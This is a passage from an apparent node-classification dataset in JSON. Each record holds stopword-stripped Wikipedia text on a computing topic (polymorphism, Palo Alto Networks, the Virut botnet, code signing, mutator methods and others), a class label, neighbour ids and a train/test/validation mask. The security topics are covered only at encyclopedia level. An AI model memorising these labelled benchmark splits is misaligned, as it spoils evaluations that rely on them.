types allows usage values whose types certain properties without losing remaining type information related concept polytypism data type genericity polytypic function general polymorphic function though one provide fixed ad hoc cases specific data types ad hoc combinator absent polymorphism distinguished implementation selected statically compile time dynamically run time typically via virtual function known respectively static dispatch dynamic dispatch corresponding forms polymorphism accordingly called static polymorphism dynamic polymorphism static polymorphism executes faster dynamic dispatch overhead requires additional compiler support static polymorphism allows greater static analysis compilers notably optimization source code analysis tools human readers programmers dynamic polymorphism flexible slower—for example dynamic polymorphism allows duck typing dynamically linked library may operate objects without knowing full type static polymorphism typically occurs ad hoc polymorphism parametric polymorphism whereas dynamic polymorphism usual subtype polymorphism however possible achieve static polymorphism subtyping sophisticated use template metaprogramming namely curiously recurring template pattern",
    "neighbors": [
      9345,
      386,
      8324,
      10246,
      655,
      9875,
      3733,
      9877,
      5783,
      11674,
      9755,
      10011,
      5917,
      11679,
      10145,
      3876,
      5796,
      5885,
      9002,
      7851,
      1591,
      4155,
      1724,
      8251,
      6718,
      3263,
      9535,
      11327,
      2115,
      8262,
      6087,
      10568,
      2505,
      8524,
      5456,
      7889,
      5074,
      7386,
      4572,
      477,
      6239,
      11361,
      10083,
      9700,
      10471,
      10729,
      3051,
      2929,
      3702,
      7158,
      3960,
      3705,
      2556,
      2557
    ],
    "mask": "Train"
  },
  {
    "node_id": 11575,
    "label": 3,
    "text": "Super_Hydlide:super hydlide super hydlide action role-playing game sega genesis/mega drive originally released 1987 japan title msx msx2 nec pc-88 ports also released nintendo famicom sharp x68000 game developed hydlide series veterans e soft released worldwide sega genesis mega drive october 6 1989 japan early 1990 united states 1991 europe remake evidences substantial graphical upgrades original hydlide 3 though gameplay remains largely identical release called hollo fighter sega advertising material one first third party published titles released u.s air diver many years events hydlide ii explosion flames appeared near city woods enemies everywhere young man chosen find source evil game incorporates 'good/evil character morality/alignment system like predecessor 1985 player morality meter aligned either justice normal evil game good evil monsters evil monsters attack player character sight good monsters attack player character attacks first killing monster good evil results reward experience points money occasionally piece equipment however player kills good monster points lost statistic called mf moral fiber player mf stat drops zero frequent traps appear across world player manages keep 100 rewards appear form random items found around fairyland unlike hydlide ii however morality meter longer affects way townsfolk react player game also features in-game clock setting day-night cycles character must eat two times day sleep regularly characters stay late fail eat regularly hp attack power gradually drop every item game including money weight total weight items player character carries exceeds load capacity lc move slowly game uses cut scenes opening ending sequences combat system similar ys choice four distinct character classes wide variety equipment spells citing varied experiences offered different playable characters morality system inclusion four save slots gamepro concluded altogether super hydlide lively cart draws epic adventure computer video games scored 81 stating like phantasy star ii huge role-playing game tough game requiring much brain-work criticized graphics sound said job gameplay fairly engrossing concluded arcade fans find lack action rather dull like games steady pace tons puzzles love 2007 alex lucard diehard gamefan listed super hydlide number 27 list top 30 rpgs cited realism instilled gameplay mechanics encumbrance system banks 24-hour clock need eat sleep described game morrowind morrowind production scalebound platinumgames director hideki kamiya said inspired hydlide 3 pc-8801 well sorcerian said hydlide 3 one first games played pc inspirational really hardcore game design one consoles time",
    "neighbors": [
      9658,
      10931,
      6077,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 11576,
    "label": 4,
    "text": "StankDawg:stankdawg david blake born 1971 also known stankdawg founder hacking group digital dawgpound ddp long-time member hacking community known regular presenter multiple hacking conferences best known creator binary revolution initiative including founding host producer binary revolution radio long-running weekly internet radio show ran 200 episodes 2003 2007 blake born newport news virginia september 13 1971 received aas associates applied sciences degree university kentucky 1992 bs computer science florida atlantic university well ceh certificate presently lives works computer programmer/analyst orlando florida blake member international high iq society stankdawg staff writer well-known hacker periodical well now-defunct blacklisted 411 magazine also contributing writer several independent zines outbreak frequency radical future frequent co-host default radio regular radio freek america appeared gameradio infonomicon mindwar phreak phactor hpr hacker public radio presented technology conferences def con h.o.p.e. interz0ne outspoken many topics many gotten negative feedback different sources controversial article entitled hacking google adwords defcon13 drew criticism people jason calacanis among others presentation fifth h.o.p.e conference drew surprise as/400 community stankdawg appeared subject television show extreme animal planet demonstrated vulnerabilities wireless internet connections blake chose handle stankdawg college started local hacking group became known digital dawgpound digital dawgpound commonly referred ddp group hackers best known series articles hacker magazines make long-running webcast binary revolution radio active set forums posts high-profile hackers strom carlson decoder phiber optik many stated mission ddp propagate positive image hackers negative mass media stereotype group welcomes new members want learn hacking attempts teach positive aspects steer away negative aspects reinforcing hacker ethic goal show hackers regularly make positive contributions technology society whole ddp founded named stankdawg stated reasons made many friends hacking scene thought would useful everyone begin working together organized fashion motivated fact well-known hacker groups 1980s accomplished great things hacking world lod mod 1988 junior high school stankdawg came name way sweet 16 computer programming competition jokingly referred teammates digital dawgpound stankdawg lurked shadows hacking world many years throughout college many different pseudonyms 1997 popped head public began becoming active irc many smaller hacking forums saw people thought insanely brilliant individuals seemed mindset positive attitude towards hacking decided approach couple see anyone would interested forming group working together always huge emphasis technical competence variety also strength character integrity team mix hackers programmers phone phreakers security professionals artists experience multiple programming languages operating systems ddp members good programmers hackers importantly good people 1999 ddp first official members partnership creativity flowed ddp communicated worked together stankdawg personal site open anyone wanted join fun stankdawg never comfortable fact name domain many people coming site coming articles presentations really appreciating great contributions community members around 2002 watching web site grow quickly decided new community needed created like-minded hackers gathering start biggest ddp project called binary revolution attempt starting true community hackers site grew ddp roster years ddp membership included several staff writers blacklisted 411 magazine including stankdawg bland_inquisitor frequently publish articles provide content appear many media sources across global interweb ddp members also regular speakers hacking conferences def con h.o.p.e. interzone notacon many smaller regional cons ddp members hold memberships mensa international high iq society stankdawg proud diversity team spoken many times binary revolution radio members coasts united states europe even members jamaica brazil many countries ddp maintains blog refer blawg obviously play intentionally misspelled word dawg posts ddp members featured technology-related sites make magazine hackaday hacked gadgets others 2003 stankdawg moved forums personal site new site part project called binary revolution considered movement towards positive hacking community binary revolution best known ddp projects commonly referred simply binrev project created attempt bring hacking community back together working towards common positive goal reclaiming name hackers binary revolution emphasizes positive aspects hacking projects help society variety outlets including monthly meetings weekly radio show binary revolution radio brr video-based series shows called hacktv active message board forums binrev radio show forums although certainly well-known projects actually composed many parts binary revolution radio often shortened brr one part binrev community started hosted blake 2003 featured different co-hosts week covered different aspects hacker culture computer security broadcast via internet stream usually prerecorded florida weekend edited released following tuesday ddp hack radio stream 9:30pm est topics included phreaking identity theft cryptography operating systems programming languages free open source software wi-fi bluetooth social engineering cyberculture information various hacker conventions phreaknic shmoocon h.o.p.e. def con july 2005 blake announced going take break third season show produced black ratchet strom carlson frequent co-hosts blake run time hosted program format rotated standard prerecorded format live format included phone calls listeners blake returned show may 2006 maintained prerecorded format brought community input show bringing members binary revolution community first episode fourth season brr first ever broadcast front live audience hope 6 convention new york city june 2006 final episode 200 took place october 30 2007 marathon episode clocked 7 hours 12 minutes forums grew many posts people looking others area hacker meetings exist approachable reason places meetings sparse information binary revolution meetings started answer problems place forum members get together binrev meetings offer free web hosting meetings help organize meetings keep communications alive help projects grow meetings large cities like chicago orlando others small towns anyone start binrev meeting asking binrev forums brnet official irc network binary revolution active hours day contains general binrev channel also contains many channels specific productive discussion middle 2003 released internet video show entitled hacktv first internet television show hacking grown series several different shows released irregularly since episodes filmed stankdawg south florida lived time wanted show appear professional terms quality made cooperating internet difficult sharing large video files difficult encoded video caused editing problems quality concerns original show released full-length 30 minute episodes also problem since difficult get enough material full-length episodes also content related hacking fringe level stankdawg feel appropriate include show led ideas light difficulties putting together full hacktv original show attempt make show accessible community contributions stankdawg launched new series less focused format video quality focused content ease participation series titled hacktv underground htv u short series allowed anyone contribute content format length video quality allowed people film things basic cameraphone quality video way get content one episode hacktv u used g4techtv show called torrent series hacktv prank style show similar popular punk 'd show mtv time even logo obvious parody punk 'd logo series contains pranks mostly took place conferences also open social engineering light-hearted content docdroppers project community project create centralized place store hacking articles information still maintaining formatting readability old ascii text files existed scattered across internet come go quickly difficult find usually formatted basics sometimes difficult read docdroppers allows users submit articles centralized place searchable easily maintained easy read reference recently project grown include encyclopedia style entries many hacking topics many deleted sites wikipedia caused docdroppers include section hacker history culture among content projects stankdawg directly involved creating/maintaining addition ones mentioned links mentioned referred entry",
    "neighbors": [
      357,
      8262,
      7983,
      2261,
      10270,
      4956,
      5373,
      2558,
      8575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11577,
    "label": 4,
    "text": "Palo_Alto_Networks:palo alto networks palo alto networks inc. nyse panw american multinational cybersecurity company headquarters santa clara california core products platform includes advanced firewalls cloud-based offerings extend firewalls cover aspects security company serves 60,000 organizations 150 countries including 85 fortune 100 home unit 42 threat research team hosts ignite cybersecurity conference company mission statement protect way life digital age preventing successful cyberattacks palo alto networks listed 8th forbes digital 100 june 2018 former google softbank executive nikesh arora joined company chairman ceo palo alto networks founded 2005 israeli-american nir zuk former engineer check point netscreen technologies principal developer first stateful inspection firewall first intrusion prevention system asked started palo alto networks zuk cited objective solving problem enterprises facing existing network security solutions inability safely enable employees use modern applications entailed developing firewall could identify provide fine-grained control applications 2007 company produced shipped first product advanced enterprise firewall branded world first next-generation firewall 2009 gartner released publication defining next-generation firewall contrast traditional firewalls time relied simple rules port numbers protocol block traffic authors stated next-generation firewalls operate inspect layers network stack intelligent enough block threats independently port numbers protocols used particular publication defined next-generation firewall containing addition full capabilities traditional firewalls intrusion prevention systems support in-line deployment without disrupting network operations application awareness full stack visibility allowing fine-grained detection control applications extra-firewall intelligence upgrade paths starting 2011 gartner began listing palo alto networks leader enterprise firewall magic quadrant company debuted nyse july 20 2012 raising 260 million initial public offering 4th-largest tech ipo 2012 2014 palo alto networks founded cyber threat alliance fortinet mcafee symantec not-for-profit organization goal improving cybersecurity greater good encouraging collaboration cybersecurity organizations sharing cyber threat intelligence amongst members 2018 organization 20 members including cisco check point juniper networks sophos company expanded significantly years offering wide selection enterprise cybersecurity services beyond original next-generation firewall offering traps endpoint protection wildfire malware prevention 2017 palo alto networks announced logging service cloud-based service allowing customers amass data machine learning data analytics 2018 company began opening dedicated cybersecurity training facilities around world part global cyber range initiative may 2018 company announced application framework open cloud-delivered ecosystem developers publish security services saas applications instantly delivered company network customers 2018 several leaders high-profile tech companies moved palo alto networks june 2018 former google chief business officer softbank president nikesh arora joined company chairman ceo predecessor mark mclaughlin became vice chairman board directors arora received pay package worth 128 million making one highest paid executives united states september 2018 liane hornsey formerly chief people officer uber joined palo alto networks chief people officer october 2018 amit singh formerly president google cloud succeeded mark anderson president palo alto networks 2019 company announced k2-series 5g-ready next-generation firewall developed service providers 5g iot requirements mind february 2019 company announced cortex ai-based continuous security platform ceo nikesh arora described cortex application framework 2.0 references application framework replaced cortex palo alto networks website palo alto networks offers enterprise cybersecurity platform provides network security cloud security endpoint protection various cloud-delivered security services components security platform listed palo alto networks website include unit 42 palo alto networks threat intelligence team group cybersecurity researchers industry experts use data collected company security platform discover new cyber threats new forms malware malicious actors operating across world group runs popular blog post technical reports analyzing active threats adversaries multiple unit 42 researchers named msrc top 100 microsoft annual ranking top 100 security researchers according fbi palo alto networks unit 42 helped solve multiple cybercrime cases mirai botnet clickfraud botnet cases luminositylink rat case assisted “ operation wire-wire 2018 unit 42 discovered gorgon hacking group believed operating pakistan targeting government organizations united kingdom spain russia united states group detected sending spear-phishing emails attached infected microsoft word documents using exploit commonly used cybercriminals cyber-espionage campaigns september 2018 unit 42 discovered xbash ransomware also performs cryptomining believed tied chinese threat actor iron xbash able propagate like worm deletes databases stored victim hosts october unit 42 warned new cryptomining malware xmrig comes bundled infected adobe flash updates malware uses victim computer resources mine monero cryptocurrency november 2018 palo alto networks announced discovery cannon trojan used target united states european government entities hackers behind malware believed fancy bear russian hacking group believed responsible hacking democratic national committee 2016 malware communicates command control server email uses encryption evade detection",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      10756,
      1935,
      1299,
      1172,
      3732,
      11542,
      9496,
      3482,
      2041,
      4511,
      6431,
      10531,
      164,
      550,
      8998,
      10790,
      2425,
      939,
      1708,
      3243,
      3629,
      3885,
      10745,
      8753,
      1970,
      10291,
      569,
      9279,
      5057,
      1858,
      10433,
      708,
      11073,
      2118,
      4814,
      9423,
      7248,
      4945,
      7121,
      467,
      10451,
      10574,
      10708,
      4568,
      4953,
      2907,
      4956,
      6364,
      94,
      3807,
      8288,
      8668,
      4194,
      9055,
      5860,
      9569,
      3942,
      8039,
      3944,
      10987,
      8943,
      4080,
      8816,
      9971,
      6646,
      1273,
      2558,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11578,
    "label": 8,
    "text": "Click_analytics:click analytics click analytics special type web analytics gives special attention clicks point-and-click constitute first stage conversion funnel commonly click analytics focuses on-site analytics editor web site uses click analytics determine performance particular site regards users site clicking also click analytics may happen real-time unreal -time depending type information sought typically frontpage editors high-traffic news media sites want monitor pages real-time optimize content editors designers types stakeholders may analyze clicks wider time frame aid assess performance writers design elements advertisements etc data clicks may gathered least two ways ideally click logged occurs method requires functionality picks relevant information event occurs alternatively one may institute assumption page view result click therefore log simulated click lead page view",
    "neighbors": [
      6576,
      8914,
      4167,
      1943
    ],
    "mask": "Test"
  },
  {
    "node_id": 11579,
    "label": 5,
    "text": "Ad_Hoc_Configuration_Protocol:ad hoc configuration protocol ad hoc configuration protocol ahcp autoconfiguration protocol ipv6 dual-stack ipv6/ipv4 networks designed used place router discovery dhcp networks difficult impossible configure server within every link-layer broadcast domain example mobile ad-hoc networks ahcp automatically configure ipv4 ipv6 addresses name servers ntp servers configure default routes since designed run together routing protocol babel olsr external links",
    "neighbors": [
      2887,
      10344,
      686,
      5469,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 11580,
    "label": 3,
    "text": "MCST-R2000:mcst-r2000 mcst r2000 64-bit microprocessor developed moscow center sparc technologies mcst fabricated tsmc",
    "neighbors": [
      4386,
      6659,
      7234,
      2503,
      7687,
      6957,
      5358,
      1776,
      1425,
      499,
      10675,
      1399,
      2490,
      2523,
      9309,
      6815
    ],
    "mask": "Test"
  },
  {
    "node_id": 11581,
    "label": 4,
    "text": "Retrospect_(software):retrospect software retrospect family software applications back computers running macos microsoft windows linux 2019 classic mac os operating systems uses client–server backup model means must backup server application running one computer small-footprint client applications running computers backed either single platform mixed platform network destination may tape drive hard disk drive cloud drive company backup server application requires macos windows versions client application run linux or—until 2019—classic mac os product used gui-scripted backup mixed-platform networks primarily small medium-sized businesses software first developed dantz development corporation 1989 initially macintosh platform later windows sales split evenly two variants macintosh variant claiming 90 market dantz development corporation acquired emc corporation 2004 2006 version 7.5 refined first release windows variant emc added performance features needed smes 2009 emc indicated intention add updated user interface separate administration console similar newly released macintosh variant version 8.0 mandatory windows security settings starting windows vista/server 2008 subsequently forbade ui interaction application auto-launched task meanwhile macintosh variant languished emc—with temporary end-of-lifing development revived 2008 emc hired back former engineers —including ex-dantz ones resulted premature release version 8.0 retrospect macintosh temporarily missing key operational features even though added performance features retrospect windows 7.5 may 2010 software sold roxio/sonic solutions 2011 following purchase sonic solutions rovi development software turned privately held company since 2012 retrospect inc. continued sell two variants backup server software nearly identical non-gui code operate differently retrospect windows substitutes view-only dashboard upgraded 2019 web-based management console—with optional deployment shared scripts retrospect macintosh separate administration console basically keeps pre-2009 terminology gui june 2019 holding company storcentric—which also owns drobo—announced acquired retrospect inc. operate independent subsidiary integrating version software drobo hardware retrospect also supports several enterprise client-server backup features include retrospect sold varying backup server capability levels called editions non-expiring license–code prices cover one major version edition dictated number server os computers backed turn specifies maximum number client computers desktop edition used desktop mobile computers linux servers backed non-multithreaded older major versions non-tape devices one non-autoloader tape drive solo edition protects single non-server computer external hard drives add-ons activate additional backup server features via edition-linked license codes may also purchased",
    "neighbors": [
      2051,
      4490,
      2571,
      6797,
      4623,
      2193,
      11030,
      9762,
      3366,
      11178,
      9901,
      2095,
      7983,
      823,
      11581,
      576,
      11201,
      1358,
      6993,
      8404,
      10711,
      7905,
      3692,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 11582,
    "label": 9,
    "text": "JSR_250:jsr 250 jsr 250 java specification request objective develop annotations information software program part program common semantic concepts java se java ee platforms apply across variety individual technologies envisioned various jsrs would use annotations enable declarative style programming would especially valuable consistency within java ee component jsrs also valuable allow consistency java ee java se jsr 250 java specification request objective define set annotations address common semantic concepts therefore used many java ee java se components avoid redundant annotations across components jsr 250 released 11 may 2006 declarative annotation-driven configuration used java frameworks applications e.g spring makes components framework configurable via annotations importance jsr 250 likely increase future jsr 250 depends jsr 175 therefore also java se 5.0 non-java ee jsr 250 annotations added java se version 6 generated postconstruct predestroy resource resources located package",
    "neighbors": [
      9988,
      3341,
      10526,
      10020,
      6067,
      2106,
      3517,
      6334,
      3518,
      3008,
      1095,
      3278,
      3920,
      4959,
      4960,
      993,
      3558,
      1128,
      3560,
      9834,
      3954
    ],
    "mask": "None"
  },
  {
    "node_id": 11583,
    "label": 4,
    "text": "Virut:virut virut cybercrime malware botnet operating least since 2006 one major botnets malware distributors internet january 2013 operations disrupted polish organization naukowa akademicka sieć komputerowa virut malware botnet known used cybercrime activities ddos attacks spam collaboration waledac botnet fraud data theft pay-per-install activities spreads executable file infection infected usb sticks media recently compromised html files thus infecting vulnerable browsers visiting compromised websites infected computers associated least 890,000 ip addresses poland 2012 symantec estimated botnet control 300,000 computers worldwide primarily egypt pakistan southeast asia including india kaspersky report listed virut fifth-most widespread threat third quarter 2012 responsible 5.5 computer infections virut botnet active since least 2006 17 january 2013 polish research development organization data networks operator operator polish .pl top-level domain registry naukowa akademicka sieć komputerowa nask took twenty three domains used virut attempt shut nask spokesperson stated first time nask engaged operation taking domains owing major threat virut botnet posed internet likely virut shut completely control servers located russian .ru top-level domain name registrars outside reach polish nask botnet able look alternate backup hosts enabling criminals operating reestablish control network",
    "neighbors": [
      3072,
      7809,
      10756,
      2953,
      3724,
      3347,
      4883,
      2325,
      278,
      3867,
      9630,
      10657,
      4648,
      939,
      7851,
      46,
      1337,
      10297,
      3643,
      1979,
      7739,
      7996,
      9664,
      9154,
      8133,
      10952,
      2508,
      81,
      4945,
      8789,
      8664,
      10457,
      7515,
      988,
      3807,
      8032,
      9569,
      3941,
      10477,
      4462,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "None"
  },
  {
    "node_id": 11584,
    "label": 4,
    "text": "Code_signing:code signing code signing process digitally signing executables scripts confirm software author guarantee code altered corrupted since signed process employs use cryptographic hash validate authenticity integrity code signing provide several valuable features common use code signing provide security deploying programming languages also used help prevent namespace conflicts almost every code signing implementation provide sort digital signature mechanism verify identity author build system checksum verify object modified also used provide versioning information object store meta data object efficacy code signing authentication mechanism software depends security underpinning signing keys public key infrastructure pki technologies integrity system relies publishers securing private keys unauthorized access keys stored software general-purpose computers susceptible compromise therefore secure best practice store keys secure tamper-proof cryptographic hardware devices known hardware security modules hsms many code signing implementations provide way sign code using system involving pair keys one public one private similar process employed tls ssh example case .net developer uses private key sign libraries executables time build key unique developer group sometimes per application object developer either generate key obtain one trusted certificate authority ca code signing particularly valuable distributed environments source given piece code may immediately evident example java applets activex controls active web browser scripting code another important usage safely provide updates patches existing software windows mac os x linux distributions provide updates using code signing ensure possible others maliciously distribute code via patch system allows receiving operating system verify update legitimate even update delivered third parties physical media disks code signing used windows mac os x authenticate software first run ensuring software maliciously tampered third-party distributor download site form code signing used linux platform decentralized nature package manager predominant mode distribution forms software updates patches well open-source model allowing direct inspection source code desired debian-based linux distributions among others validate downloaded packages using public key cryptography public key used authenticate code signature traceable back trusted root authority ca preferably using secure public key infrastructure pki ensure code trusted comes stated source explicitly particular private key ca provides root trust level able assign trust others proxy user trusts ca user presumably trust legitimacy code signed key generated ca one proxies many operating systems frameworks contain built-in trust one existing cas entrust datacard verisign/symantec digicert comodo godaddy globalsign also commonplace large organizations implement private ca internal organization provides features public cas trusted within organization model developers choose provide self-generated key scenario user would normally obtain public key fashion directly developer verify object first time many code signing systems store public key inside signature software frameworks oss check code signature executing allow choose trust developer point first run application developer provide similar system including public keys installer key used ensure subsequent objects need run upgrades plugins another application verified coming developer time-stamping designed circumvent trust warning appear case expired certificate effect time-stamping extends code trust beyond validity period certificate event certificate revoked due compromise specific date time compromising event become part revocation record case time-stamping helps establish whether code signed certificate compromised developers need sign ios tvos apps running real device uploading app store needed prove developer owns valid apple developer id application needs valid profile certificate run devices like security measure code signing defeated users tricked running unsigned code even running code refuses validate system remains secure long private key remains private also important note code signing protect end user malicious activity unintentional software bugs software author — merely ensures software modified anyone author sometimes sandbox systems accept certificates false time-stamp excess usage ram ibm lotus notes pki signing code release 1 client server software execution control lists control levels access data environment file system permitted given users individual design elements including active items scripts actions agents always signed using editor id file includes editor domain public keys core templates mail template signed dedicated id held lotus template development team microsoft implements form code signing based authenticode provided microsoft tested drivers since drivers run kernel destabilize system open system security holes reason microsoft tests drivers submitted whql program driver passed microsoft signs version driver safe 32-bit systems installing drivers validated microsoft possible accepting allow installation prompt warning user code unsigned .net managed code additional mechanism called strong name signing uses public/private keys sha-1 hash opposed certificates however microsoft discourages reliance strong name signing replacement authenticode context consumer devices games consoles unsigned code often used refer application signed cryptographic key normally required software accepted executed console games signed secret key designed console maker game load console several methods get unsigned code execute include software exploits use modchip technique known swap trick running softmod may initially seem obvious simply copying signed application onto another dvd allow boot xbox reason xbox executable file xbe contains media-type flag specifies type media xbe bootable nearly xbox software set executable boot factory produced discs simply copying executable burnable media enough stop execution software however since executable signed simply changing value flag possible alters signature executable causing fail validation checked proliferation connected devices required ability identify authenticate devices ability applies area internet things iot iot requires devices trusted iot code signing software release process ensures integrity iot device software firmware updates defends risks associated tampering device code embedded device credentialing enables control manufacturing process high technology products protects unauthorized production counterfeits together code signing technology ensures physical authenticity authenticity integrity code possess time manufacture use digital birth certificate subsequent upgrades code validation time product lifecycle creating new dimension code signing elevating security awareness need maintain private signing keys secured within dedicated protected environment establish root trust entire system given prevalence malware advanced persistent threats apts many software vendors providers online services enterprise organizations manufacturers high-technology iot devices pressure increase security high technology manufacturing code signing process",
    "neighbors": [
      3843,
      5764,
      517,
      9221,
      9732,
      6411,
      9356,
      6797,
      9744,
      3473,
      5138,
      8865,
      8615,
      6954,
      10026,
      9780,
      10036,
      1337,
      9791,
      576,
      3779,
      10566,
      5067,
      1103,
      2383,
      10831,
      11605,
      6488,
      5465,
      91,
      4957,
      9437,
      9569,
      10341,
      9063,
      10221,
      10478,
      3958,
      5117
    ],
    "mask": "Test"
  },
  {
    "node_id": 11585,
    "label": 3,
    "text": "Brooks's_law:brooks law brooks law observation software project management according adding human resources late software project makes later coined fred brooks 1975 book mythical man-month according brooks incremental person added project makes take less time similar general law diminishing returns economics according brooks law outrageous oversimplification captures general rule brooks points main factors explain works way key points brooks law allow exceptions open door possible solutions first point note brooks law applies projects already late projects brought back kept control people added earlier process also important determine project really late schedule originally overly optimistic scheduling mistakes account large number late projects correcting schedule best way meaningful reliable time frame project completion quantity quality role people added project also must taken consideration one simple way circumvent law overrun project add people needed way extra capacity compensates training communication overhead good programmers specialists added less overhead training people added tasks related project example quality assurance documentation given task clear ramp time minimized modern practices continuous integration test-driven development iterative development significantly reduce inter-developer communication overhead thus allow better scalability new tools software development documentation also help minimize ramp time making simpler new programmers get involved work design patterns simplify distribution work entire team part within framework provided pattern design pattern defines rules programmers follow simplifies communication use standard language provides consistency scalability finally good segmentation helps minimizing communication overhead team members smaller sub-problems solved smaller team top-level team responsible systems integration method work segmentation problem must done correctly first place done incorrectly make problem worse better impeding communication programmers working parts problem actually closely coupled even project plan decreed way finish project invert brooks law bermuda plan 90 developers removed send bermuda remaining 10 complete software",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 11586,
    "label": 1,
    "text": "Iraqi_Legal_Database:iraqi legal database iraqi legal database ild first comprehensive electronic legal database created arab region project create ild launched 2004 united nations development programme undp programme governance arab region pogar implemented coordination higher judicial council objective behind project make entire corpus iraqi law available judges lawyers academics lawmakers individuals institutions rely legal knowledge single freely accessible source keeping objective ild published online september 2008 makes available users 27,433 legal texts altogether including 7,136 laws 4,265 ministerial instructions 3,268 regulations 5,029 declarations etc. say every single iraqi legal text passed since 1917 ild entirely free-of-charge require users subscribe way iraq country office united nations development programme source funding ild ild available arabic iraqi law translated language systematic manner therefore legal researchers jurists interested iraqi law must carry research arabic non-arabic speaking researchers interested learning ild ’ features may download following powerpoint presentation illustrates translates english ild ’ various functions project originally designed implemented three phases",
    "neighbors": [
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 11587,
    "label": 2,
    "text": "MAX_(operating_system):max operating system max linux distribution sponsored office education autonomous community madrid spain max stands madrid linux used based ubuntu last release max 10 based ubuntu 16.04 lts xenial xerus since 2003 max installed computers schools community madrid max educational linux large set instructive programs addition usual desktop programs max supports common desktop environments max 10 mate installed default main features simplicity stability huge collection software max comes live dvd installable system usb version changelog http //ftp.rediris.es/mirror/max-linux/maxdesktop/max7.5/cambios.txt educamadrid web site",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      823,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 11588,
    "label": 4,
    "text": "Open_Mobile_Terminal_Platform:open mobile terminal platform open mobile terminal platform omtp forum created mobile network operators discuss standards manufacturers mobile phones mobile devices lifetime omtp included manufacturers huawei lg electronics motorola nokia samsung sony ericsson omtp originally set leading mobile operators time transitioned wholesale applications community end june 2010 nine full members deutsche telekom ag kt orange smart communications telecom italia telefónica telenor vodafone omtp also support two sponsors ericsson nokia omtp recommendations hugely helped standardise mobile operator terminal requirements work gone towards helping defragment deoptionalise operators recommendations omtp ’ focus gathering driving mobile terminal requirements publishing findings recommendations omtp technology neutral recommendations intended deployment across range technology platforms operating systems os middleware layers omtp perhaps best known work field mobile security work encompassed full range mobile device capabilities omtp published recommendations 2007 early 2008 areas positioning enablers advanced device management ims mobile voip later advanced trusted environment omtp tr1 supporting document 'security threats embedded consumer devices released endorsement uk home secretary jacqui smith omtp also published requirements document addressing support advanced sim cards document defines also advanced profiles smart card web server high speed protocol mobile tv contactless omtp also made significant progress getting support use micro-usb standard connector data power full list recommendations found http //www.gsma.com/newsroom/technical-documents/omtp-documents/ 2008 omtp launched new initiative called bondi named australian beach initiative defined new interfaces javascript apis security framework based xacml policy description enable access mobile phone functionalities application invocation application settings camera communications log gallery location messaging persistent data personal information phone status user interaction browser widget engine secure way bondi initiative also open source reference implementation https //web.archive.org/web/20130509121758/https //web.archive.org/web/20130509121758/http //bondi.omtp.org// approved release 1.0 bondi issued june 2009 open source project comprehensive bondi sdk started http //bondisdk.org february 2009 omtp expanded local connectivity specification based micro-usb describe requirements common charger common connector enable sharing battery charger different phones omtp common charging local data connectivity adopted gsm association universal charging system ucs initiative endorsed ctia itu june 2009 european commission reached agreement several major mobile phone providers requirements common external power supply eps compatible new data-enabled phones sold european union eps shares key attributes ucs charger june 2010 omtp transitioned new wholesale applications community omtp activities ceased time either taken within wac organisation standards industry associations turn july 2012 wac closed omtp standards transferred gsma assets personnel transferring apigee",
    "neighbors": [
      7936,
      3462,
      424,
      1740,
      9356,
      10303,
      5404,
      2013,
      9311
    ],
    "mask": "None"
  },
  {
    "node_id": 11589,
    "label": 9,
    "text": "Mutator_method:mutator method computer science mutator method method used control changes variable also widely known setter methods often setter accompanied getter also known accessor returns value private member variable mutator method often used object-oriented programming keeping principle encapsulation according principle member variables class made private hide protect code modified public member function mutator method takes desired new value parameter optionally validates modifies private member variable mutator methods compared assignment operator overloading typically appear different levels object hierarchy mutator methods may also used non-object-oriented environments case reference variable modified passed mutator along new value scenario compiler restrict code bypassing mutator method changing variable directly onus falls developers ensure variable modified mutator method modified directly programming languages support properties offer convenient alternative without giving utility encapsulation examples fully implemented mutator method also validate input data take action triggering event alternative defining mutator accessor methods property blocks give instance variable visibility private access directly outside objects much finer control access rights defined using mutators accessors example parameter may made read-only simply defining accessor mutator visibility two methods may different often useful accessor public mutator remains protected package-private internal block mutator defined provides opportunity validation preprocessing incoming data external access guaranteed come mutator steps bypassed example date represented separate private codice_1 codice_2 codice_3 variables incoming dates split codice_4 mutator consistency private instance variables accessed codice_5 codice_6 cases month values outside 1 12 rejected code accessors conversely allow synthesis useful data representations internal variables keeping structure encapsulated hidden outside modules monetary codice_7 accessor may build string numeric variable number decimal places defined hidden codice_8 parameter modern programming languages often offer ability generate boilerplate mutators accessors single line—as example c codice_9 ruby codice_10 cases code blocks created validation preprocessing synthesis simplified accessors still retain advantage encapsulation simple public instance variables common system designs progress software maintained requirements change demands data become sophisticated many automatic mutators accessors eventually get replaced separate blocks code benefit automatically creating early days implementation public interface class remains identical whether greater sophistication added requiring extensive refactoring manipulation parameters mutators accessors inside class defined often requires additional thought early days implementation little additional code blocks makes difference private instance variable accessed directly validation cross-validation data integrity checks preprocessing sophistication added subtle bugs may appear internal access makes use newer code places bypassed accessor functions less efficient directly fetching storing data fields due extra steps involved however functions often inlined eliminates overhead function call file student.h file student.c file main.c file makefile file student.h file student.cpp example illustrates c idea properties special type class member unlike java explicit methods defined public 'property contains logic handle actions note use built-in undeclared variable codice_11 later c versions .net framework 3.5 example may abbreviated follows without declaring private variable codice_12 using abbreviated syntax means underlying variable longer available inside class result codice_13 portion property must present assignment access restricted codice_13-specific access modifier common lisp object system slot specifications within class definitions may specify codice_15 codice_16 codice_17 options even multiple times define reader methods setter methods accessor methods reader method respective codice_18 method slots always directly accessible names use codice_19 codice_20 slot accessor options define specialized methods use codice_20 clos notion properties although metaobject protocol extension specifies means access slot reader writer function names including ones generated codice_17 option following example shows definition student class using slot options direct 